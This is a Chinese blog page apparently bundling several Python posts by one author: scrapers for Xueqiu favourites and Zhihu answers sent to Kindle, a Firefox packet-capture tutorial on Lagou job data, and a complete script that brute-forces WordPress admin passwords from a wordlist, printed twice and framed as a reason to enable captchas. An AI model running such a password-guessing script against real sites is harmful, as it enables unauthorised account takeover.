#抓取雪球的收藏文章
__author__ = 'Rocky'
import requests,cookielib,re,json,time
from toolkit import Toolkit
from lxml import etree
url='https://xueqiu.com/snowman/login'
session = requests.session()

session.cookies = cookielib.LWPCookieJar(filename="cookies")
try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

agent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers = {'Host': 'xueqiu.com',
'Referer': 'https://xueqiu.com/',
'Origin':'https://xueqiu.com',
'User-Agent': agent}
account=Toolkit.getUserData('data.cfg')
print account['snowball_user']
print account['snowball_password']

data={'username':account['snowball_user'],'password':account['snowball_password']}
s=session.post(url,data=data,headers=headers)
print s.status_code
#print s.text
session.cookies.save()
fav_temp='https://xueqiu.com/favs?page=1'
collection=session.get(fav_temp,headers=headers)
fav_content= collection.text
p=re.compile('"maxPage":(\d+)')
maxPage=p.findall(fav_content)[0]
print maxPage
print type(maxPage)
maxPage=int(maxPage)
print type(maxPage)
for i in range(1,maxPage+1):
fav='https://xueqiu.com/favs?page=%d' %i
collection=session.get(fav,headers=headers)
fav_content= collection.text
#print fav_content
p=re.compile('var favs = {(.*?)};',re.S|re.M)
result=p.findall(fav_content)[0].strip()

new_result='{'+result+'}'
#print type(new_result)
#print new_result
data=json.loads(new_result)
use_data= data['list']
host='https://xueqiu.com'
for i in use_data:
url=host+ i['target']
print url
txt_content=session.get(url,headers=headers).text
#print txt_content.text

tree=etree.HTML(txt_content)
title=tree.xpath('//title/text()')[0]

filename = re.sub('[\/:*?"<>|]', '-', title)
print filename

content=tree.xpath('//div[@class="detail"]')
for i in content:
Toolkit.save2filecn(filename, i.xpath('string(.)'))
#print content
#Toolkit.save2file(filename,)
time.sleep(10)





 
用法:
1. snowball.py -- 抓取雪球上我的收藏的文章
使用: 创建一个data.cfg的文件,里面格式如下:
snowball_user=xxxxx@xx.com
snowball_password=密码

然后运行python snowball.py ,会自动登录雪球,然后 在当前目录生产txt文件。
 
github代码:https://github.com/Rockyzsu/xueqiu

python 暴力破解wordpress博客后台登陆密码

低调的哥哥 发表了文章 • 0 个评论 • 8972 次浏览 • 2016-05-13 17:49 • 来自相关话题

自己曾经折腾过一阵子wordpress的博客,说实话,wordpress在博客系统里面算是功能很强大的了,没有之一。
不过用wordpress的朋友可能都是贪图方便,很多设置都使用的默认,我之前使用的某一个wordpress版本中,它的后台没有任何干扰的验证码(因为它默认给用户关闭了,需要自己去后台开启,一般用户是使用缺省设置)。
 






所以只要使用python+urllib库,就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。
 
所以以后用wordpress的博客用户,平时还是把图片验证码的功能开启,怎样安全性会高很多。(其实python也带有一个破解一个验证码的库  - 。-!)# coding=utf-8
# 破解wordpress 后台用户密码
import urllib, urllib2, time, re, cookielib,sys


class wordpress():
def __init__(self, host, username):
#初始化定义 header ,避免被服务器屏蔽
self.username = username
self.http="http://"+host
self.url = self.http + "/wp-login.php"
self.redirect = self.http + "/wp-admin/"
self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
self.referer=self.http+"/wp-login.php"
self.cook="wordpress_test_cookie=WP+Cookie+check"
self.host=host
self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}
self.cookie = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))


def crash(self, filename):
try:
pwd = open(filename, 'r')
#读取密码文件,密码文件中密码越多破解的概率越大
while 1 :
i=pwd.readline()
if not i :
break

data = urllib.urlencode(
{"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
#构造好数据包之后提交给wordpress网站后台
Resp = urllib2.urlopen(Req)
result = Resp.read()
# print result
login = re.search(r'login_error', result)
#判断返回来的字符串,如果有login error说明失败了。
if login:
pass
else:
print "Crashed! password is %s %s" % (self.username,i.strip())
g=open("wordpress.txt",'w+')
g.write("Crashed! password is %s %s" % (self.username,i.strip()))
pwd.close()
g.close()
#如果匹配到密码, 则这次任务完成,退出程序
exit()
break

pwd.close()

except Exception, e:
print "error"
print e
print "Error in reading password"


if __name__ == "__main__":
print "begin at " + time.ctime()
host=sys.argv[1]
#url = "http://"+host
#给程序提供参数,为你要破解的网址
user = sys.argv[2]
dictfile=sys.argv[3]
#提供你事先准备好的密码文件
obj = wordpress(host, user)
#obj.check(dictfile)
obj.crash(dictfile)
#obj.crash_v()
print "end at " + time.ctime()





 
github源码:https://github.com/Rockyzsu/crashWordpressPassword
  查看全部
自己曾经折腾过一阵子wordpress的博客,说实话,wordpress在博客系统里面算是功能很强大的了,没有之一。
不过用wordpress的朋友可能都是贪图方便,很多设置都使用的默认,我之前使用的某一个wordpress版本中,它的后台没有任何干扰的验证码(因为它默认给用户关闭了,需要自己去后台开启,一般用户是使用缺省设置)。
 

wordpress后台.PNG


所以只要使用python+urllib库,就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。
 
所以以后用wordpress的博客用户,平时还是把图片验证码的功能开启,怎样安全性会高很多。(其实python也带有一个破解一个验证码的库  - 。-!)
# coding=utf-8
# 破解wordpress 后台用户密码
import urllib, urllib2, time, re, cookielib,sys


class wordpress():
def __init__(self, host, username):
#初始化定义 header ,避免被服务器屏蔽
self.username = username
self.http="http://"+host
self.url = self.http + "/wp-login.php"
self.redirect = self.http + "/wp-admin/"
self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
self.referer=self.http+"/wp-login.php"
self.cook="wordpress_test_cookie=WP+Cookie+check"
self.host=host
self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}
self.cookie = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))


def crash(self, filename):
try:
pwd = open(filename, 'r')
#读取密码文件,密码文件中密码越多破解的概率越大
while 1 :
i=pwd.readline()
if not i :
break

data = urllib.urlencode(
{"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
#构造好数据包之后提交给wordpress网站后台
Resp = urllib2.urlopen(Req)
result = Resp.read()
# print result
login = re.search(r'login_error', result)
#判断返回来的字符串,如果有login error说明失败了。
if login:
pass
else:
print "Crashed! password is %s %s" % (self.username,i.strip())
g=open("wordpress.txt",'w+')
g.write("Crashed! password is %s %s" % (self.username,i.strip()))
pwd.close()
g.close()
#如果匹配到密码, 则这次任务完成,退出程序
exit()
break

pwd.close()

except Exception, e:
print "error"
print e
print "Error in reading password"


if __name__ == "__main__":
print "begin at " + time.ctime()
host=sys.argv[1]
#url = "http://"+host
#给程序提供参数,为你要破解的网址
user = sys.argv[2]
dictfile=sys.argv[3]
#提供你事先准备好的密码文件
obj = wordpress(host, user)
#obj.check(dictfile)
obj.crash(dictfile)
#obj.crash_v()
print "end at " + time.ctime()





 
github源码:https://github.com/Rockyzsu/crashWordpressPassword
 

python爬虫 模拟登陆知乎 推送知乎文章到kindle电子书 获取自己的关注问题

低调的哥哥 发表了文章 • 0 个评论 • 23786 次浏览 • 2016-05-12 17:53 • 来自相关话题

平时逛知乎,上班的时候看到一些好的答案,不过由于答案太长,没来得及看完,所以自己写了个python脚本,把自己想要的答案抓取下来,并且推送到kindle上,下班后用kindle再慢慢看。 平时喜欢的内容也可以整理成电子书抓取下来,等周末闲时看。
 
#2016-08-19更新:
添加了模拟登陆知乎的模块,自动获取自己的关注的问题id,然后把这些问题的所有答案抓取下来推送到kindle











# -*-coding=utf-8-*-
__author__ = 'Rocky'
# -*-coding=utf-8-*-
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
from email import Encoders, Utils
import urllib2
import time
import re
import sys
import os

from bs4 import BeautifulSoup

from email.Header import Header

reload(sys)
sys.setdefaultencoding('utf-8')


class GetContent():
def __init__(self, id):

# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574

id_link = "/question/" + id
self.getAnswer(id_link)

def save2file(self, filename, content):
# 保存为电子书文件
filename = filename + ".txt"
f = open(filename, 'a')
f.write(content)
f.close()

def getAnswer(self, answerID):
host = "http://www.zhihu.com"
url = host + answerID
print url
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
# 构造header 伪装一下
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)

try:
resp = urllib2.urlopen(req)
except:
print "Time out. Retry"
time.sleep(30)
# try to switch with proxy ip
resp = urllib2.urlopen(req)
# 这里已经获取了 网页的代码,接下来就是提取你想要的内容。 使用beautifulSoup 来处理,很方便
try:
bs = BeautifulSoup(resp)

except:
print "Beautifulsoup error"
return None

title = bs.title
# 获取的标题

filename_old = title.string.strip()
print filename_old
filename = re.sub('[\/:*?"<>|]', '-', filename_old)
# 用来保存内容的文件名,因为文件名不能有一些特殊符号,所以使用正则表达式过滤掉

self.save2file(filename, title.string)


detail = bs.find("div", class_="zm-editable-content")

self.save2file(filename, "\n\n\n\n--------------------Detail----------------------\n\n")
# 获取问题的补充内容

if detail is not None:

for i in detail.strings:
self.save2file(filename, unicode(i))

answer = bs.find_all("div", class_="zm-editable-content clearfix")
k = 0
index = 0
for each_answer in answer:

self.save2file(filename, "\n\n-------------------------answer %s via -------------------------\n\n" % k)

for a in each_answer.strings:
# 循环获取每一个答案的内容,然后保存到文件中
self.save2file(filename, unicode(a))
k += 1
index = index + 1

smtp_server = 'smtp.126.com'
from_mail = 'your@126.com'
password = 'yourpassword'
to_mail = 'yourname@kindle.cn'

# send_kindle=MailAtt(smtp_server,from_mail,password,to_mail)
# send_kindle.send_txt(filename)

# 调用发送邮件函数,把电子书发送到你的kindle用户的邮箱账号,这样你的kindle就可以收到电子书啦
print filename


class MailAtt():
def __init__(self, smtp_server, from_mail, password, to_mail):
self.server = smtp_server
self.username = from_mail.split("@")[0]
self.from_mail = from_mail
self.password = password
self.to_mail = to_mail

# 初始化邮箱设置

def send_txt(self, filename):
# 这里发送附件尤其要注意字符编码,当时调试了挺久的,因为收到的文件总是乱码
self.smtp = smtplib.SMTP()
self.smtp.connect(self.server)
self.smtp.login(self.username, self.password)
self.msg = MIMEMultipart()
self.msg['to'] = self.to_mail
self.msg['from'] = self.from_mail
self.msg['Subject'] = "Convert"
self.filename = filename + ".txt"
self.msg['Date'] = Utils.formatdate(localtime=1)
content = open(self.filename.decode('utf-8'), 'rb').read()
# print content
self.att = MIMEText(content, 'base64', 'utf-8')
self.att['Content-Type'] = 'application/octet-stream'
# self.att["Content-Disposition"] = "attachment;filename=\"%s\"" %(self.filename.encode('gb2312'))
self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % Header(self.filename, 'gb2312')
# print self.att["Content-Disposition"]
self.msg.attach(self.att)

self.smtp.sendmail(self.msg['from'], self.msg['to'], self.msg.as_string())
self.smtp.quit()


if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "content")
# 专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

id = sys.argv[1]
# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574


# id_link="/question/"+id
obj = GetContent(id)
# obj.getAnswer(id_link)

# 调用获取函数

print "Done"





 
#######################################
2016.8.19 更新
添加了新功能,模拟知乎登陆,自动获取自己关注的答案,制作成电子书并且发送到kindle





 # -*-coding=utf-8-*-
__author__ = 'Rocky'
import requests
import cookielib
import re
import json
import time
import os
from getContent import GetContent
agent='Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers={'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com',
'User-Agent':agent}

#全局变量
session=requests.session()

session.cookies=cookielib.LWPCookieJar(filename="cookies")

try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

def isLogin():
url='https://www.zhihu.com/settings/profile'
login_code=session.get(url,headers=headers,allow_redirects=False).status_code
print login_code
if login_code == 200:
return True
else:
return False

def get_xsrf():
url='http://www.zhihu.com'
r=session.get(url,headers=headers,allow_redirects=False)
txt=r.text
result=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>',txt)[0]
return result

def getCaptcha():
#r=1471341285051
r=(time.time()*1000)
url='http://www.zhihu.com/captcha.gif?r='+str(r)+'&type=login'

image=session.get(url,headers=headers)
f=open("photo.jpg",'wb')
f.write(image.content)
f.close()


def Login():
xsrf=get_xsrf()
print xsrf
print len(xsrf)
login_url='http://www.zhihu.com/login/email'
data={
'_xsrf':xsrf,
'password':'*',
'remember_me':'true',
'email':'*'
}
try:
content=session.post(login_url,data=data,headers=headers)
login_code=content.text
print content.status_code
#this line important ! if no status, if will fail and execute the except part
#print content.status

if content.status_code != requests.codes.ok:
print "Need to verification code !"
getCaptcha()
#print "Please input the code of the captcha"
code=raw_input("Please input the code of the captcha")
data['captcha']=code
content=session.post(login_url,data=data,headers=headers)
print content.status_code

if content.status_code==requests.codes.ok:
print "Login successful"
session.cookies.save()
#print login_code
else:
session.cookies.save()
except:
print "Error in login"
return False

def focus_question():
focus_id=
url='https://www.zhihu.com/question/following'
content=session.get(url,headers=headers)
print content
p=re.compile(r'<a class="question_link" href="/question/(\d+)" target="_blank" data-id')
id_list=p.findall(content.text)
pattern=re.compile(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>')
result=re.findall(pattern,content.text)[0]
print result
for i in id_list:
print i
focus_id.append(i)

url_next='https://www.zhihu.com/node/ProfileFollowedQuestionsV2'
page=20
offset=20
end_page=500
xsrf=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"',content.text)[0]
while offset < end_page:
#para='{"offset":20}'
#print para
print "page: %d" %offset
params={"offset":offset}
params_json=json.dumps(params)

data={
'method':'next',
'params':params_json,
'_xsrf':xsrf
}
#注意上面那里 post的data需要一个xsrf的字段,不然会返回403 的错误,这个在抓包的过程中一直都没有看到提交到xsrf,所以自己摸索出来的
offset=offset+page
headers_l={
'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com/question/following',
'User-Agent':agent,
'Origin':'https://www.zhihu.com',
'X-Requested-With':'XMLHttpRequest'
}
try:
s=session.post(url_next,data=data,headers=headers_l)
#print s.status_code
#print s.text
msgs=json.loads(s.text)
msg=msgs['msg']
for i in msg:
id_sub=re.findall(p,i)

for j in id_sub:
print j
id_list.append(j)

except:
print "Getting Error "


return id_list

def main():

if isLogin():
print "Has login"
else:
print "Need to login"
Login()
list_id=focus_question()
for i in list_id:
print i
obj=GetContent(i)

#getCaptcha()
if __name__=='__main__':
sub_folder=os.path.join(os.getcwd(),"content")
#专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

main()
 
 完整代码请猛击这里:
github: https://github.com/Rockyzsu/zhihuToKindle
  查看全部
平时逛知乎,上班的时候看到一些好的答案,不过由于答案太长,没来得及看完,所以自己写了个python脚本,把自己想要的答案抓取下来,并且推送到kindle上,下班后用kindle再慢慢看。 平时喜欢的内容也可以整理成电子书抓取下来,等周末闲时看。
 
#2016-08-19更新:
添加了模拟登陆知乎的模块,自动获取自己的关注的问题id,然后把这些问题的所有答案抓取下来推送到kindle


11.PNG



kindle.JPG
# -*-coding=utf-8-*-
__author__ = 'Rocky'
# -*-coding=utf-8-*-
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
from email import Encoders, Utils
import urllib2
import time
import re
import sys
import os

from bs4 import BeautifulSoup

from email.Header import Header

reload(sys)
sys.setdefaultencoding('utf-8')


class GetContent():
def __init__(self, id):

# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574

id_link = "/question/" + id
self.getAnswer(id_link)

def save2file(self, filename, content):
# 保存为电子书文件
filename = filename + ".txt"
f = open(filename, 'a')
f.write(content)
f.close()

def getAnswer(self, answerID):
host = "http://www.zhihu.com"
url = host + answerID
print url
user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
# 构造header 伪装一下
header = {"User-Agent": user_agent}
req = urllib2.Request(url, headers=header)

try:
resp = urllib2.urlopen(req)
except:
print "Time out. Retry"
time.sleep(30)
# try to switch with proxy ip
resp = urllib2.urlopen(req)
# 这里已经获取了 网页的代码,接下来就是提取你想要的内容。 使用beautifulSoup 来处理,很方便
try:
bs = BeautifulSoup(resp)

except:
print "Beautifulsoup error"
return None

title = bs.title
# 获取的标题

filename_old = title.string.strip()
print filename_old
filename = re.sub('[\/:*?"<>|]', '-', filename_old)
# 用来保存内容的文件名,因为文件名不能有一些特殊符号,所以使用正则表达式过滤掉

self.save2file(filename, title.string)


detail = bs.find("div", class_="zm-editable-content")

self.save2file(filename, "\n\n\n\n--------------------Detail----------------------\n\n")
# 获取问题的补充内容

if detail is not None:

for i in detail.strings:
self.save2file(filename, unicode(i))

answer = bs.find_all("div", class_="zm-editable-content clearfix")
k = 0
index = 0
for each_answer in answer:

self.save2file(filename, "\n\n-------------------------answer %s via -------------------------\n\n" % k)

for a in each_answer.strings:
# 循环获取每一个答案的内容,然后保存到文件中
self.save2file(filename, unicode(a))
k += 1
index = index + 1

smtp_server = 'smtp.126.com'
from_mail = 'your@126.com'
password = 'yourpassword'
to_mail = 'yourname@kindle.cn'

# send_kindle=MailAtt(smtp_server,from_mail,password,to_mail)
# send_kindle.send_txt(filename)

# 调用发送邮件函数,把电子书发送到你的kindle用户的邮箱账号,这样你的kindle就可以收到电子书啦
print filename


class MailAtt():
def __init__(self, smtp_server, from_mail, password, to_mail):
self.server = smtp_server
self.username = from_mail.split("@")[0]
self.from_mail = from_mail
self.password = password
self.to_mail = to_mail

# 初始化邮箱设置

def send_txt(self, filename):
# 这里发送附件尤其要注意字符编码,当时调试了挺久的,因为收到的文件总是乱码
self.smtp = smtplib.SMTP()
self.smtp.connect(self.server)
self.smtp.login(self.username, self.password)
self.msg = MIMEMultipart()
self.msg['to'] = self.to_mail
self.msg['from'] = self.from_mail
self.msg['Subject'] = "Convert"
self.filename = filename + ".txt"
self.msg['Date'] = Utils.formatdate(localtime=1)
content = open(self.filename.decode('utf-8'), 'rb').read()
# print content
self.att = MIMEText(content, 'base64', 'utf-8')
self.att['Content-Type'] = 'application/octet-stream'
# self.att["Content-Disposition"] = "attachment;filename=\"%s\"" %(self.filename.encode('gb2312'))
self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % Header(self.filename, 'gb2312')
# print self.att["Content-Disposition"]
self.msg.attach(self.att)

self.smtp.sendmail(self.msg['from'], self.msg['to'], self.msg.as_string())
self.smtp.quit()


if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "content")
# 专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

id = sys.argv[1]
# 给出的第一个参数 就是你要下载的问题的id
# 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么 就输入 python zhihu.py 29372574


# id_link="/question/"+id
obj = GetContent(id)
# obj.getAnswer(id_link)

# 调用获取函数

print "Done"





 
#######################################
2016.8.19 更新
添加了新功能,模拟知乎登陆,自动获取自己关注的答案,制作成电子书并且发送到kindle

知乎.PNG

 
# -*-coding=utf-8-*-
__author__ = 'Rocky'
import requests
import cookielib
import re
import json
import time
import os
from getContent import GetContent
agent='Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers={'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com',
'User-Agent':agent}

#全局变量
session=requests.session()

session.cookies=cookielib.LWPCookieJar(filename="cookies")

try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

def isLogin():
url='https://www.zhihu.com/settings/profile'
login_code=session.get(url,headers=headers,allow_redirects=False).status_code
print login_code
if login_code == 200:
return True
else:
return False

def get_xsrf():
url='http://www.zhihu.com'
r=session.get(url,headers=headers,allow_redirects=False)
txt=r.text
result=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>',txt)[0]
return result

def getCaptcha():
#r=1471341285051
r=(time.time()*1000)
url='http://www.zhihu.com/captcha.gif?r='+str(r)+'&type=login'

image=session.get(url,headers=headers)
f=open("photo.jpg",'wb')
f.write(image.content)
f.close()


def Login():
xsrf=get_xsrf()
print xsrf
print len(xsrf)
login_url='http://www.zhihu.com/login/email'
data={
'_xsrf':xsrf,
'password':'*',
'remember_me':'true',
'email':'*'
}
try:
content=session.post(login_url,data=data,headers=headers)
login_code=content.text
print content.status_code
#this line important ! if no status, if will fail and execute the except part
#print content.status

if content.status_code != requests.codes.ok:
print "Need to verification code !"
getCaptcha()
#print "Please input the code of the captcha"
code=raw_input("Please input the code of the captcha")
data['captcha']=code
content=session.post(login_url,data=data,headers=headers)
print content.status_code

if content.status_code==requests.codes.ok:
print "Login successful"
session.cookies.save()
#print login_code
else:
session.cookies.save()
except:
print "Error in login"
return False

def focus_question():
focus_id=
url='https://www.zhihu.com/question/following'
content=session.get(url,headers=headers)
print content
p=re.compile(r'<a class="question_link" href="/question/(\d+)" target="_blank" data-id')
id_list=p.findall(content.text)
pattern=re.compile(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>')
result=re.findall(pattern,content.text)[0]
print result
for i in id_list:
print i
focus_id.append(i)

url_next='https://www.zhihu.com/node/ProfileFollowedQuestionsV2'
page=20
offset=20
end_page=500
xsrf=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"',content.text)[0]
while offset < end_page:
#para='{"offset":20}'
#print para
print "page: %d" %offset
params={"offset":offset}
params_json=json.dumps(params)

data={
'method':'next',
'params':params_json,
'_xsrf':xsrf
}
#注意上面那里 post的data需要一个xsrf的字段,不然会返回403 的错误,这个在抓包的过程中一直都没有看到提交到xsrf,所以自己摸索出来的
offset=offset+page
headers_l={
'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com/question/following',
'User-Agent':agent,
'Origin':'https://www.zhihu.com',
'X-Requested-With':'XMLHttpRequest'
}
try:
s=session.post(url_next,data=data,headers=headers_l)
#print s.status_code
#print s.text
msgs=json.loads(s.text)
msg=msgs['msg']
for i in msg:
id_sub=re.findall(p,i)

for j in id_sub:
print j
id_list.append(j)

except:
print "Getting Error "


return id_list

def main():

if isLogin():
print "Has login"
else:
print "Need to login"
Login()
list_id=focus_question()
for i in list_id:
print i
obj=GetContent(i)

#getCaptcha()
if __name__=='__main__':
sub_folder=os.path.join(os.getcwd(),"content")
#专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

main()

 
 完整代码请猛击这里:
github: https://github.com/Rockyzsu/zhihuToKindle
 

Firefox抓包分析 (拉勾网抓包分析)

低调的哥哥 发表了文章 • 15 个评论 • 11390 次浏览 • 2016-05-09 18:30 • 来自相关话题

针对一些JS网页,动态网页在源码中无法看到它的内容,可以通过抓包分析出其JSON格式的数据。 网页通过通过这些JSON数据对网页的内容进行填充,然后就看到网页里显示相关的内容了。
 
使用过chrome,firefox,wireshark来抓过包,比较方便的是chrome,不需要安装第三方的其它插件,不过打开新页面的时候又要重新开一个捕捉页面,会错过一些实时的数据。 
 
wireshark需要专门掌握它自己的过滤规则,学习成本摆在那里。 
 
最好用的还是firefox+firebug第三方插件。
 
接下来以拉勾网为例。
 
打开firebug功能
 
www.lagou.com 在左侧栏随便点击一个岗位,以android为例 
 





 
在firebug中,需要点击“网络”选项卡,然后选择XHR。
 





 
Post的信息就是我们需要关注的,点击post的链接
 





 
点击了Android之后 我们从浏览器上传了几个参数到拉勾的服务器
一个是 first =true, 一个是kd = android, (关键字) 一个是pn =1 (page number 页码)
 
所以我们就可以模仿这一个步骤来构造一个数据包来模拟用户的点击动作。post_data = {'first':'true','kd':'Android','pn':'1'}
然后使用python中库中最简单的requests库来提交数据。 而这些数据 正是抓包里看到的数据。import requests

url = "http://www.lagou.com/jobs/posi ... ot%3B
return_data=requests.post(url,data=post_data)
print return_data.text

呐,打印出来的数据就是返回来的json数据{"code":0,"success":true,"requestId":null,"resubmitToken":null,"msg":null,"content":{"pageNo":1,"pageSize":15,"positionResult":{"totalCount":5000,"pageSize":15,"locationInfo":{"city":null,"district":null,"businessZone":null},"result":[{"createTime":"2016-05-05 17:27:50","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1455217,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术极客云集","industryField":"移动互联网 · 企业服务","score":1372,"district":"西城区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":13,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462440470000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":6627,"pvScore":73.2258060280967,"plus":"是","businessZones":["新街口","德胜门","小西天"],"publisherId":994817,"loginTime":1462876049000,"appShow":3141,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-05 18:30:16","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1440576,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术爆棚!","industryField":"移动互联网 · 企业服务","score":1372,"district":"海淀区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":6,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462444216000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":3214,"pvScore":73.37271526202157,"plus":"是","businessZones":["双榆树","中关村","大钟寺"],"publisherId":994817,"loginTime":1462876049000,"appShow":1782,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 18:41:29","companyId":94307,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"宁波海大物联科技有限公司","city":"宁波","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1070249,"companyLogo":"image2/M00/03/32/CgqLKVXtWiuAUbXgAAB1g_5FW3Y484.png?cc=0.6152940313331783","positionFirstType":"技术","companyName":"海大物联","positionAdvantage":"一流的技术团队,丰厚的薪资回报。","industryField":"移动互联网 · 企业服务","score":1353,"district":"鄞州区","companyLabelList":["节日礼物","年底双薪","带薪年假","年度旅游"],"deliverCount":0,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462876889000,"positonTypesMap":null,"hrScore":75,"flowScore":167,"showCount":1031,"pvScore":47.6349840620252,"plus":"是","businessZones":null,"publisherId":2494230,"loginTime":1462885305000,"appShow":184,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"18:41发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:43","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1387825,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业项目。优质福利待遇+期权","industryField":"移动互联网 · 医疗健康","score":1344,"district":"江干区","companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":5,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874263000,"positonTypesMap":null,"hrScore":74,"flowScore":153,"showCount":1312,"pvScore":66.87818057124453,"plus":"是","businessZones":["四季青","景芳"],"publisherId":3655492,"loginTime":1462873104000,"appShow":573,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:49:47","companyId":15071,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州短趣网络传媒技术有限公司","city":"杭州","salary":"10k-20k","financeStage":"成长型(A轮)","positionId":1803257,"companyLogo":"image2/M00/0B/80/CgpzWlYYse2AJgc0AABG9iSEWAE052.jpg","positionFirstType":"技术","companyName":"短趣网","positionAdvantage":"高额项目奖金,行业内有竞争力的薪资水平","industryField":"移动互联网 · 